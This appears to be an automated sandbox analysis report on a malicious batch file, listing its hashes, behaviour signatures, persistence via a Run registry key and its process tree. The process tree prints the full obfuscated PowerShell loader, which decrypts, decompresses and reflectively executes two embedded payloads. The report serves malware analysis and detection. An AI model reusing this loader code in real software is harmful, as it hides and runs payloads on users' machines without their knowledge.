Analysis
-
max time kernel
118s -
max time network
119s -
platform
windows7_x64 -
resource
win7-20240419-en -
resource tags
arch:x64arch:x86image:win7-20240419-enlocale:en-usos:windows7-x64system -
submitted
18-06-2024 17:46
Static task
static1
Behavioral task
behavioral1
Sample
54M9lg5.bat
Resource
win7-20240419-en
6 signatures
150 seconds
General
-
Target
54M9lg5.bat
-
Size
388KB
-
MD5
31cebd7e588526ab0e13b91877c08665
-
SHA1
52929c1bd8765d5573848494d880bf2484acac12
-
SHA256
fb199c109cc8551b14ce74fc759e7e2430f7f5a57cd410ac8cdb5cb894bbfeb8
-
SHA512
64b35bead23bf5310cd3afb7de4504dc67911ed6e9b9c4a3aaf106505e081657f8da3f3444e6b74c1e9744f9dd1b4646b27c35d05f6af2b7614aecb251a9bf61
-
SSDEEP
12288:yX/PIvkGjjGp/BqbaywxRYCXEP2+oeUwG1GKp:QPIcGjjkEwxRYCX42Thp
Score
8/10
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
-
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
StikyNot.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-481678230-3773327859-3495911762-1000\Software\Microsoft\Windows\CurrentVersion\Run\RESTART_STICKY_NOTES = "C:\\Windows\\system32\\StikyNot.exe" StikyNot.exe -
Suspicious behavior: EnumeratesProcesses 1 IoCs
Processes:
powershell.exepid process 1996 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 1996 powershell.exe -
Suspicious use of FindShellTrayWindow 2 IoCs
Processes:
StikyNot.exepid process 2812 StikyNot.exe 2812 StikyNot.exe -
Suspicious use of WriteProcessMemory 6 IoCs
Processes:
cmd.exedescription pid process target process PID 1936 wrote to memory of 2456 1936 cmd.exe cmd.exe PID 1936 wrote to memory of 2456 1936 cmd.exe cmd.exe PID 1936 wrote to memory of 2456 1936 cmd.exe cmd.exe PID 1936 wrote to memory of 1996 1936 cmd.exe powershell.exe PID 1936 wrote to memory of 1996 1936 cmd.exe powershell.exe PID 1936 wrote to memory of 1996 1936 cmd.exe powershell.exe
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\54M9lg5.bat"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('f3MdSQvZVMcn6E7f4B+XvVgVp1iwF8nc01VvmvGOU0U='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('tMZBwLm+KLwTB8FTX+suaA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $DtgGd=New-Object System.IO.MemoryStream(,$param_var); $UJAmf=New-Object System.IO.MemoryStream; $NciVC=New-Object System.IO.Compression.GZipStream($DtgGd, [IO.Compression.CompressionMode]::Decompress); $NciVC.CopyTo($UJAmf); $NciVC.Dispose(); $DtgGd.Dispose(); $UJAmf.Dispose(); $UJAmf.ToArray();}function execute_function($param_var,$param2_var){ $QoXwT=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $GTccN=$QoXwT.EntryPoint; $GTccN.Invoke($null, $param2_var);}$jYuiO = 'C:\Users\Admin\AppData\Local\Temp\54M9lg5.bat';$host.UI.RawUI.WindowTitle = $jYuiO;$gXwGM=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($jYuiO).Split([Environment]::NewLine);foreach ($LLKpG in $gXwGM) { if ($LLKpG.StartsWith('icuYuBCnSxMVygOBoHMo')) { $vmoAo=$LLKpG.Substring(20); break; }}$payloads_var=[string[]]$vmoAo.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "2⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\StikyNot.exe"C:\Windows\system32\StikyNot.exe"1⤵
- Adds Run key to start application
- Suspicious use of FindShellTrayWindow
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
memory/1996-4-0x000007FEF5D5E000-0x000007FEF5D5F000-memory.dmpFilesize
4KB
-
memory/1996-5-0x000000001B580000-0x000000001B862000-memory.dmpFilesize
2.9MB
-
memory/1996-6-0x0000000002820000-0x0000000002828000-memory.dmpFilesize
32KB
-
memory/1996-7-0x000007FEF5AA0000-0x000007FEF643D000-memory.dmpFilesize
9.6MB
-
memory/1996-9-0x000007FEF5AA0000-0x000007FEF643D000-memory.dmpFilesize
9.6MB
-
memory/1996-8-0x000007FEF5AA0000-0x000007FEF643D000-memory.dmpFilesize
9.6MB
-
memory/1996-10-0x000007FEF5AA0000-0x000007FEF643D000-memory.dmpFilesize
9.6MB
-
memory/1996-11-0x000007FEF5AA0000-0x000007FEF643D000-memory.dmpFilesize
9.6MB
-
memory/1996-12-0x000007FEF5D5E000-0x000007FEF5D5F000-memory.dmpFilesize
4KB
-
memory/2812-15-0x0000000002500000-0x0000000002501000-memory.dmpFilesize
4KB